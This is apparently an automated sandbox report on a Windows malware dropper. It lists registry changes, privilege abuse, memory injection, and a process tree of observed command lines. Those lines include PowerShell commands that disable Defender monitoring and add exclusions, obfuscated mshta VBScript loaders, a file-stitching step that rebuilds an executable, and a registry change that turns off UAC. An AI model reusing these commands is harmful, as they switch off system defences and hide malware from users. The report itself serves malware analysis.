Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs svchost.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed svchost.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates WerFault.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates WerFault.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs WaaSMedicAgent.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs WaaSMedicAgent.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs WaaSMedicAgent.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs WerFault.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs WerFault.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs WerFault.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.FilePicker_cw5n1h2txyewy%5Cresources.pri\1d75a03dc98eb7\a37dfe62 compattelrunner.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA WaaSMedicAgent.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates WaaSMedicAgent.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs WaaSMedicAgent.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs svchost.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot svchost.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs svchost.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs WerFault.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs WerFault.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs WaaSMedicAgent.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs WaaSMedicAgent.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs WaaSMedicAgent.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates svchost.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs svchost.exe
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02grcmqafcyquvns\Provision Monday, November 08, 2021 08:24:33 = "AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAD3BBhn9bckmDrgxwt2/KowAAAAACAAAAAAAQZgAAAAEAACAAAADswsNyBtmVaotI+En6zEBRUeEQYcheTSY9zNvCWY+RtAAAAAAOgAAAAAIAACAAAAC03+rXo5oIFmOXZzImlcFwKAbHaGwIjg+v++XR2vRJMCAAAABy5XXJRtzD52ZHiwWHn66OD8WTj3uUaVtuyVqtYlGdG0AAAADTt+LEMYpMHh6kkfegnK7VD6P2r1Z6ZYg6A+5EULyO9ivmo5lIRHVf/vFY2MYqPd0ZRJi7LazPr62i1p3v3N//" svchost.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates WerFault.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot WerFault.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates WaaSMedicAgent.exe
Modifies registry class 6 IoCs
description ioc Process
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f8278c54-a712-415b-b593-b77a2be0dda9}\Instance\ Explorer.EXE
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-257790753-2419383948-818201544-1000\{EDDDE615-9E7D-49AB-8644-ABE5B013D13E} Calculator.exe
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Explorer.EXE
Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Explorer.EXE
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Explorer.EXE
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\Instance\ Explorer.EXE
Runs ping.exe 1 TTPs 3 IoCs
pid | Process
4616 | PING.EXE
6860 | PING.EXE
4604 | PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs
pid | Process
4872 | powershell.exe
4872 | powershell.exe
4384 | powershell.exe
4384 | powershell.exe
2280 | Wed1229427acd4bc167.exe
2280 | Wed1229427acd4bc167.exe
2280 | Wed1229427acd4bc167.exe
2280 | Wed1229427acd4bc167.exe
2280 | Wed1229427acd4bc167.exe
2280 | Wed1229427acd4bc167.exe
2280 | Wed1229427acd4bc167.exe
2280 | Wed1229427acd4bc167.exe
2280 | Wed1229427acd4bc167.exe
2280 | Wed1229427acd4bc167.exe
2280 | Wed1229427acd4bc167.exe
2280 | Wed1229427acd4bc167.exe
2280 | Wed1229427acd4bc167.exe
2280 | Wed1229427acd4bc167.exe
2280 | Wed1229427acd4bc167.exe
2280 | Wed1229427acd4bc167.exe
1812 | Wed129eb9b8859.exe
1812 | Wed129eb9b8859.exe
2280 | Wed1229427acd4bc167.exe
2280 | Wed1229427acd4bc167.exe
1812 | Wed129eb9b8859.exe
2280 | Wed1229427acd4bc167.exe
2280 | Wed1229427acd4bc167.exe
1812 | Wed129eb9b8859.exe
1812 | Wed129eb9b8859.exe
1812 | Wed129eb9b8859.exe
1812 | Wed129eb9b8859.exe
2280 | Wed1229427acd4bc167.exe
1812 | Wed129eb9b8859.exe
2280 | Wed1229427acd4bc167.exe
1812 | Wed129eb9b8859.exe
1812 | Wed129eb9b8859.exe
2280 | Wed1229427acd4bc167.exe
1812 | Wed129eb9b8859.exe
2280 | Wed1229427acd4bc167.exe
1812 | Wed129eb9b8859.exe
2280 | Wed1229427acd4bc167.exe
2280 | Wed1229427acd4bc167.exe
2280 | Wed1229427acd4bc167.exe
1812 | Wed129eb9b8859.exe
1812 | Wed129eb9b8859.exe
2280 | Wed1229427acd4bc167.exe
2280 | Wed1229427acd4bc167.exe
2280 | Wed1229427acd4bc167.exe
1812 | Wed129eb9b8859.exe
1812 | Wed129eb9b8859.exe
2280 | Wed1229427acd4bc167.exe
2280 | Wed1229427acd4bc167.exe
2280 | Wed1229427acd4bc167.exe
2280 | Wed1229427acd4bc167.exe
1812 | Wed129eb9b8859.exe
1812 | Wed129eb9b8859.exe
1812 | Wed129eb9b8859.exe
1812 | Wed129eb9b8859.exe
2280 | Wed1229427acd4bc167.exe
2280 | Wed1229427acd4bc167.exe
1812 | Wed129eb9b8859.exe
1812 | Wed129eb9b8859.exe
2280 | Wed1229427acd4bc167.exe
2280 | Wed1229427acd4bc167.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid | Process
3196 | Explorer.EXE

Suspicious behavior: MapViewOfSection 10 IoCs
pid | Process
5592 | JoVBqle5ZuYZOmKRj95tPfGf.exe
5420 | ArGiap3960SUZs1dAEDT_gNj.exe
1288 | 7elpvTmw1vT1ONC9ndp6H4va.exe
5420 | ArGiap3960SUZs1dAEDT_gNj.exe
5420 | ArGiap3960SUZs1dAEDT_gNj.exe
1288 | 7elpvTmw1vT1ONC9ndp6H4va.exe
1288 | 7elpvTmw1vT1ONC9ndp6H4va.exe
7540 | 8355.exe
6512 | systray.exe
6512 | systray.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
pid | Process
6728 | msedge.exe
6728 | msedge.exe
6728 | msedge.exe
6728 | msedge.exe
6728 | msedge.exe

Suspicious behavior: SetClipboardViewer 1 IoCs
pid | Process
9052 | 2208308.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs
description | pid | Process
Token: SeShutdownPrivilege | 2052 | svchost.exe
Token: SeCreatePagefilePrivilege | 2052 | svchost.exe
Token: SeShutdownPrivilege | 2052 | svchost.exe
Token: SeCreatePagefilePrivilege | 2052 | svchost.exe
Token: SeShutdownPrivilege | 2052 | svchost.exe
Token: SeCreatePagefilePrivilege | 2052 | svchost.exe
Token: SeShutdownPrivilege | 2516 | svchost.exe
Token: SeCreatePagefilePrivilege | 2516 | svchost.exe
Token: SeDebugPrivilege | 4872 | powershell.exe
Token: SeDebugPrivilege | 4384 | powershell.exe
Token: SeDebugPrivilege | 2348 | Wed12ebaf7883e1890d.exe
Token: SeRestorePrivilege | 1912 | WerFault.exe
Token: SeBackupPrivilege | 1912 | WerFault.exe
Token: SeBackupPrivilege | 1912 | WerFault.exe
Token: SeDebugPrivilege | 4584 | Wed1241cc206cfb.exe
Token: SeDebugPrivilege | 4560 | taskkill.exe
Token: SeCreateTokenPrivilege | 5932 | schtasks.exe
Token: SeAssignPrimaryTokenPrivilege | 5932 | schtasks.exe
Token: SeLockMemoryPrivilege | 5932 | schtasks.exe
Token: SeIncreaseQuotaPrivilege | 5932 | schtasks.exe
Token: SeMachineAccountPrivilege | 5932 | schtasks.exe
Token: SeTcbPrivilege | 5932 | schtasks.exe
Token: SeSecurityPrivilege | 5932 | schtasks.exe
Token: SeTakeOwnershipPrivilege | 5932 | schtasks.exe
Token: SeLoadDriverPrivilege | 5932 | schtasks.exe
Token: SeSystemProfilePrivilege | 5932 | schtasks.exe
Token: SeSystemtimePrivilege | 5932 | schtasks.exe
Token: SeProfSingleProcessPrivilege | 5932 | schtasks.exe
Token: SeIncBasePriorityPrivilege | 5932 | schtasks.exe
Token: SeCreatePagefilePrivilege | 5932 | schtasks.exe
Token: SeCreatePermanentPrivilege | 5932 | schtasks.exe
Token: SeBackupPrivilege | 5932 | schtasks.exe
Token: SeRestorePrivilege | 5932 | schtasks.exe
Token: SeShutdownPrivilege | 5932 | schtasks.exe
Token: SeDebugPrivilege | 5932 | schtasks.exe
Token: SeAuditPrivilege | 5932 | schtasks.exe
Token: SeSystemEnvironmentPrivilege | 5932 | schtasks.exe
Token: SeChangeNotifyPrivilege | 5932 | schtasks.exe
Token: SeRemoteShutdownPrivilege | 5932 | schtasks.exe
Token: SeUndockPrivilege | 5932 | schtasks.exe
Token: SeSyncAgentPrivilege | 5932 | schtasks.exe
Token: SeEnableDelegationPrivilege | 5932 | schtasks.exe
Token: SeManageVolumePrivilege | 5932 | schtasks.exe
Token: SeImpersonatePrivilege | 5932 | schtasks.exe
Token: SeCreateGlobalPrivilege | 5932 | schtasks.exe
Token: 31 | 5932 | schtasks.exe
Token: 32 | 5932 | schtasks.exe
Token: 33 | 5932 | schtasks.exe
Token: 34 | 5932 | schtasks.exe
Token: 35 | 5932 | schtasks.exe
Token: SeDebugPrivilege | 5676 | AdvancedRun.exe
Token: SeDebugPrivilege | 5660 | AdvancedRun.exe
Token: SeDebugPrivilege | 6036 | 6736747.exe
Token: SeImpersonatePrivilege | 5660 | AdvancedRun.exe
Token: SeImpersonatePrivilege | 5676 | AdvancedRun.exe
Token: SeTcbPrivilege | 5732 | svchost.exe
Token: SeTcbPrivilege | 5732 | svchost.exe
Token: SeDebugPrivilege | 5152 | Conhost.exe
Token: SeDebugPrivilege | 5644 | 503782.exe
Token: SeShutdownPrivilege | 3196 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 3196 | Explorer.EXE
Token: SeShutdownPrivilege | 3196 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 3196 | Explorer.EXE
Token: SeShutdownPrivilege | 3196 | Explorer.EXE

Suspicious use of FindShellTrayWindow 4 IoCs
pid | Process
7872 | setup.tmp
6540 | Calculator.exe
6728 | msedge.exe
7160 | installer.exe

Suspicious use of UnmapMainImage 1 IoCs
pid | Process
3196 | Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs
description | pid | Process | procid_target
PID 1408 wrote to memory of 2972 | 1408 | 9c4880a98c53084391a2e2ec350515da63c1dc8ac929af17f012b690b0453782.exe | 82
PID 1408 wrote to memory of 2972 | 1408 | 9c4880a98c53084391a2e2ec350515da63c1dc8ac929af17f012b690b0453782.exe | 82
PID 1408 wrote to memory of 2972 | 1408 | 9c4880a98c53084391a2e2ec350515da63c1dc8ac929af17f012b690b0453782.exe | 82
PID 2972 wrote to memory of 2116 | 2972 | setup_installer.exe | 83
PID 2972 wrote to memory of 2116 | 2972 | setup_installer.exe | 83
PID 2972 wrote to memory of 2116 | 2972 | setup_installer.exe | 83
PID 2516 wrote to memory of 5080 | 2516 | svchost.exe | 88
PID 2516 wrote to memory of 5080 | 2516 | svchost.exe | 88
PID 2116 wrote to memory of 4284 | 2116 | setup_install.exe | 89
PID 2116 wrote to memory of 4284 | 2116 | setup_install.exe | 89
PID 2116 wrote to memory of 4284 | 2116 | setup_install.exe | 89
PID 2116 wrote to memory of 4012 | 2116 | setup_install.exe | 90
PID 2116 wrote to memory of 4012 | 2116 | setup_install.exe | 90
PID 2116 wrote to memory of 4012 | 2116 | setup_install.exe | 90
PID 2116 wrote to memory of 5016 | 2116 | setup_install.exe | 127
PID 2116 wrote to memory of 5016 | 2116 | setup_install.exe | 127
PID 2116 wrote to memory of 5016 | 2116 | setup_install.exe | 127
PID 4284 wrote to memory of 4384 | 4284 | cmd.exe | 91
PID 4284 wrote to memory of 4384 | 4284 | cmd.exe | 91
PID 4284 wrote to memory of 4384 | 4284 | cmd.exe | 91
PID 2116 wrote to memory of 720 | 2116 | setup_install.exe | 92
PID 2116 wrote to memory of 720 | 2116 | setup_install.exe | 92
PID 2116 wrote to memory of 720 | 2116 | setup_install.exe | 92
PID 2116 wrote to memory of 3216 | 2116 | setup_install.exe | 126
PID 2116 wrote to memory of 3216 | 2116 | setup_install.exe | 126
PID 2116 wrote to memory of 3216 | 2116 | setup_install.exe | 126
PID 4012 wrote to memory of 4872 | 4012 | cmd.exe | 93
PID 4012 wrote to memory of 4872 | 4012 | cmd.exe | 93
PID 4012 wrote to memory of 4872 | 4012 | cmd.exe | 93
PID 2116 wrote to memory of 1904 | 2116 | setup_install.exe | 94
PID 2116 wrote to memory of 1904 | 2116 | setup_install.exe | 94
PID 2116 wrote to memory of 1904 | 2116 | setup_install.exe | 94
PID 2116 wrote to memory of 3172 | 2116 | setup_install.exe | 114
PID 2116 wrote to memory of 3172 | 2116 | setup_install.exe | 114
PID 2116 wrote to memory of 3172 | 2116 | setup_install.exe | 114
PID 5016 wrote to memory of 3436 | 5016 | cmd.exe | 95
PID 5016 wrote to memory of 3436 | 5016 | cmd.exe | 95
PID 5016 wrote to memory of 3436 | 5016 | cmd.exe | 95
PID 2116 wrote to memory of 1560 | 2116 | setup_install.exe | 96
PID 2116 wrote to memory of 1560 | 2116 | setup_install.exe | 96
PID 2116 wrote to memory of 1560 | 2116 | setup_install.exe | 96
PID 2116 wrote to memory of 4188 | 2116 | setup_install.exe | 97
PID 2116 wrote to memory of 4188 | 2116 | setup_install.exe | 97
PID 2116 wrote to memory of 4188 | 2116 | setup_install.exe | 97
PID 2116 wrote to memory of 4192 | 2116 | setup_install.exe | 113
PID 2116 wrote to memory of 4192 | 2116 | setup_install.exe | 113
PID 2116 wrote to memory of 4192 | 2116 | setup_install.exe | 113
PID 2116 wrote to memory of 2224 | 2116 | setup_install.exe | 99
PID 2116 wrote to memory of 2224 | 2116 | setup_install.exe | 99
PID 2116 wrote to memory of 2224 | 2116 | setup_install.exe | 99
PID 3216 wrote to memory of 3764 | 3216 | cmd.exe | 111
PID 3216 wrote to memory of 3764 | 3216 | cmd.exe | 111
PID 3216 wrote to memory of 3764 | 3216 | cmd.exe | 111
PID 2116 wrote to memory of 1380 | 2116 | setup_install.exe | 110
PID 2116 wrote to memory of 1380 | 2116 | setup_install.exe | 110
PID 2116 wrote to memory of 1380 | 2116 | setup_install.exe | 110
PID 720 wrote to memory of 3292 | 720 | cmd.exe | 98
PID 720 wrote to memory of 3292 | 720 | cmd.exe | 98
PID 720 wrote to memory of 3292 | 720 | cmd.exe | 98
PID 3172 wrote to memory of 3832 | 3172 | cmd.exe | 112
PID 3172 wrote to memory of 3832 | 3172 | cmd.exe | 112
PID 3172 wrote to memory of 3832 | 3172 | cmd.exe | 112
PID 1904 wrote to memory of 440 | 1904 | cmd.exe | 100
PID 1904 wrote to memory of 440 | 1904 | cmd.exe | 100

System policy modification 1 TTPs 5 IoCs
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | hgFUPQSfVWja4bF9va2Nco94.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | hgFUPQSfVWja4bF9va2Nco94.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | hepatocyte.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | 877E.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | scriptwriters.exe
Processes (indented by depth in the process tree; "cmd:" is the observed command line)
C:\Windows\Explorer.EXE
  cmd: C:\Windows\Explorer.EXE
  - Modifies registry class
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of UnmapMainImage
  PID: 3196
  C:\Users\Admin\AppData\Local\Temp\9c4880a98c53084391a2e2ec350515da63c1dc8ac929af17f012b690b0453782.exe
    cmd: "C:\Users\Admin\AppData\Local\Temp\9c4880a98c53084391a2e2ec350515da63c1dc8ac929af17f012b690b0453782.exe"
    - Suspicious use of WriteProcessMemory
    PID: 1408
    C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
      cmd: "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory
      PID: 2972
      C:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\setup_install.exe
        cmd: "C:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\setup_install.exe"
        - Executes dropped EXE
        - Loads dropped DLL
        - Suspicious use of WriteProcessMemory
        PID: 2116
        C:\Windows\SysWOW64\cmd.exe
          cmd: C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
          - Suspicious use of WriteProcessMemory
          PID: 4284
          C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            cmd: powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            PID: 4384
        C:\Windows\SysWOW64\cmd.exe
          cmd: C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
          - Suspicious use of WriteProcessMemory
          PID: 4012
          C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            cmd: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            PID: 4872
        C:\Windows\SysWOW64\cmd.exe
          cmd: C:\Windows\system32\cmd.exe /c Wed12fb2a5c52f05816.exe
          - Suspicious use of WriteProcessMemory
          PID: 720
          C:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\Wed12fb2a5c52f05816.exe
            cmd: Wed12fb2a5c52f05816.exe
            - Executes dropped EXE
            PID: 3292
            C:\Windows\SysWOW64\mshta.exe
              cmd: "C:\Windows\System32\mshta.exe" vBSCripT:cLOSe ( creaTeoBJeCT( "wSCrIpT.shell").RuN ( "CMd.ExE /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\Wed12fb2a5c52f05816.exe"" VAKlCUnlQu.exe && STArt VAkLCUnlqU.EXe -PRwIZKFgSE6xyUR7ivEyVbD3Oolfm & If """"=="""" for %E in ( ""C:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\Wed12fb2a5c52f05816.exe"") do taskkill -F -IM ""%~nxE"" " ,0, TRUe ) )
              PID: 4308
              C:\Windows\SysWOW64\cmd.exe
                cmd: "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\Wed12fb2a5c52f05816.exe" VAKlCUnlQu.exe&& STArt VAkLCUnlqU.EXe -PRwIZKFgSE6xyUR7ivEyVbD3Oolfm & If ""=="" for %E in ( "C:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\Wed12fb2a5c52f05816.exe") do taskkill -F -IM "%~nxE"
                PID: 5732
                C:\Users\Admin\AppData\Local\Temp\VAKlCUnlQu.exe
                  cmd: VAkLCUnlqU.EXe -PRwIZKFgSE6xyUR7ivEyVbD3Oolfm
                  - Executes dropped EXE
                  PID: 5964
                  C:\Windows\SysWOW64\mshta.exe
                    cmd: "C:\Windows\System32\mshta.exe" vBSCripT:cLOSe ( creaTeoBJeCT( "wSCrIpT.shell").RuN ( "CMd.ExE /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\VAKlCUnlQu.exe"" VAKlCUnlQu.exe && STArt VAkLCUnlqU.EXe -PRwIZKFgSE6xyUR7ivEyVbD3Oolfm & If ""-PRwIZKFgSE6xyUR7ivEyVbD3Oolfm ""=="""" for %E in ( ""C:\Users\Admin\AppData\Local\Temp\VAKlCUnlQu.exe"") do taskkill -F -IM ""%~nxE"" " ,0, TRUe ) )
                    PID: 5088
                    C:\Windows\SysWOW64\cmd.exe
                      cmd: "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\VAKlCUnlQu.exe" VAKlCUnlQu.exe&& STArt VAkLCUnlqU.EXe -PRwIZKFgSE6xyUR7ivEyVbD3Oolfm & If "-PRwIZKFgSE6xyUR7ivEyVbD3Oolfm "=="" for %E in ( "C:\Users\Admin\AppData\Local\Temp\VAKlCUnlQu.exe") do taskkill -F -IM "%~nxE"
                      PID: 3248
                  C:\Windows\SysWOW64\mshta.exe
                    cmd: "C:\Windows\System32\mshta.exe" vBSCrIpt: cLoSE ( CREaTEOBjECt( "wSCRiPt.shell" ). RUn ( "cmD.exE /c eCHo | SEt /P = ""MZ"" > s4AW._YK & CoPy /B /y s4aW._YK + 4kt1N2.SAG +JISYX0.0 CFIfB.3 & DEl 4KT1N2.SAG JiSYX0.0 S4AW._YK& STArt msiexec /y .\CFIFB.3 ", 0 ,TRuE) )
                    PID: 5892
                    C:\Windows\SysWOW64\cmd.exe
                      cmd: "C:\Windows\System32\cmd.exe" /c eCHo | SEt /P = "MZ" > s4AW._YK & CoPy /B /y s4aW._YK+ 4kt1N2.SAG+JISYX0.0 CFIfB.3 & DEl 4KT1N2.SAG JiSYX0.0 S4AW._YK& STArt msiexec /y .\CFIFB.3
                      PID: 5156
                      C:\Windows\SysWOW64\cmd.exe
                        cmd: C:\Windows\system32\cmd.exe /S /D /c" SEt /P = "MZ" 1>s4AW._YK"
                        PID: 6576
                      C:\Windows\SysWOW64\cmd.exe
                        cmd: C:\Windows\system32\cmd.exe /S /D /c" eCHo "
                        PID: 6564
                      C:\Windows\SysWOW64\msiexec.exe
                        cmd: msiexec /y .\CFIFB.3
                        - Loads dropped DLL
                        PID: 6760
                C:\Windows\SysWOW64\taskkill.exe
                  cmd: taskkill -F -IM "Wed12fb2a5c52f05816.exe"
                  - Kills process with taskkill
                  - Suspicious use of AdjustPrivilegeToken
                  PID: 4560
        C:\Windows\SysWOW64\cmd.exe
          cmd: C:\Windows\system32\cmd.exe /c Wed1217e6a0ef74ed.exe
          - Suspicious use of WriteProcessMemory
          PID: 1904
          C:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\Wed1217e6a0ef74ed.exe
            cmd: Wed1217e6a0ef74ed.exe
            - Executes dropped EXE
            PID: 440
        C:\Windows\SysWOW64\cmd.exe
          cmd: C:\Windows\system32\cmd.exe /c Wed12bcd18bdbc441.exe
          PID: 1560
          C:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\Wed12bcd18bdbc441.exe
            cmd: Wed12bcd18bdbc441.exe
            - Executes dropped EXE
            PID: 1692
        C:\Windows\SysWOW64\cmd.exe
          cmd: C:\Windows\system32\cmd.exe /c Wed12859e3c1cf63b6a0.exe
          PID: 4188
          C:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\Wed12859e3c1cf63b6a0.exe
            cmd: Wed12859e3c1cf63b6a0.exe
            - Executes dropped EXE
            - Suspicious use of SetThreadContext
            PID: 2996
            C:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\Wed12859e3c1cf63b6a0.exe
              cmd: C:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\Wed12859e3c1cf63b6a0.exe
              - Executes dropped EXE
              PID: 5532
        C:\Windows\SysWOW64\cmd.exe
          cmd: C:\Windows\system32\cmd.exe /c Wed12fbb08f1dfc28.exe
          PID: 2224
          C:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\Wed12fbb08f1dfc28.exe
            cmd: Wed12fbb08f1dfc28.exe
            - Executes dropped EXE
            PID: 1116
            C:\Windows\SysWOW64\WerFault.exe
              cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 1116 -s 244
              - Program crash
              PID: 5348
        C:\Windows\SysWOW64\cmd.exe
          cmd: C:\Windows\system32\cmd.exe /c Wed12ebaf7883e1890d.exe
          PID: 8
          C:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\Wed12ebaf7883e1890d.exe
            cmd: Wed12ebaf7883e1890d.exe
            - Executes dropped EXE
            - Suspicious use of AdjustPrivilegeToken
            PID: 2348
        C:\Windows\SysWOW64\cmd.exe
          cmd: C:\Windows\system32\cmd.exe /c Wed1241cc206cfb.exe
          PID: 5056
          C:\Users\Admin\AppData\Local\Temp\7zSC9BE2DE4\Wed1241cc206cfb.exe
            cmd: Wed1241cc206cfb.exe
            - Executes dropped EXE
            - Suspicious use of AdjustPrivilegeToken
            PID: 4584
            C:\Users\Admin\AppData\Roaming\6736747.exe
              cmd: "C:\Users\Admin\AppData\Roaming\6736747.exe"
              - Executes dropped EXE
              - Suspicious use of AdjustPrivilegeToken
              PID: 6036
            C:\Users\Admin\AppData\Roaming\227470.exe
              cmd: "C:\Users\Admin\AppData\Roaming\227470.exe"
              - Executes dropped EXE
              - Checks BIOS information in registry
              - Checks whether UAC is enabled
              - Suspicious use of NtSetInformationThreadHideFromDebugger
              PID: 5228
            C:\Users\Admin\AppData\Roaming\3551538.exe
              cmd: "C:\Users\Admin\AppData\Roaming\3551538.exe"
              PID: 5628
            C:\Users\Admin\AppData\Roaming\3601344.exe
              cmd: "C:\Users\Admin\AppData\Roaming\3601344.exe"
              - Executes dropped EXE
              PID: 6128
              C:\Windows\SysWOW64\mshta.exe
                cmd: "C:\Windows\System32\mshta.exe" vbscRIpt: cLosE ( CreateOBjEct ( "WsCrIpT.shelL"). Run ( "cMD /q /c cOPy /Y ""C:\Users\Admin\AppData\Roaming\3601344.exe"" ..\RxAPuFNW.exe && sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i & IF """" == """" for %Z iN ( ""C:\Users\Admin\AppData\Roaming\3601344.exe"" ) do taskkill -f -Im ""%~NXZ"" ", 0, TRUE ))
                PID: 5548
                C:\Windows\SysWOW64\cmd.exe
                  cmd: "C:\Windows\System32\cmd.exe" /q /c cOPy /Y "C:\Users\Admin\AppData\Roaming\3601344.exe" ..\RxAPuFNW.exe &&sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i &IF "" == "" for %Z iN ( "C:\Users\Admin\AppData\Roaming\3601344.exe" ) do taskkill -f -Im "%~NXZ"
                  PID: 5124
                  C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe
                    cmd: ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i
                    - Executes dropped EXE
                    PID: 6912
                    C:\Windows\SysWOW64\mshta.exe
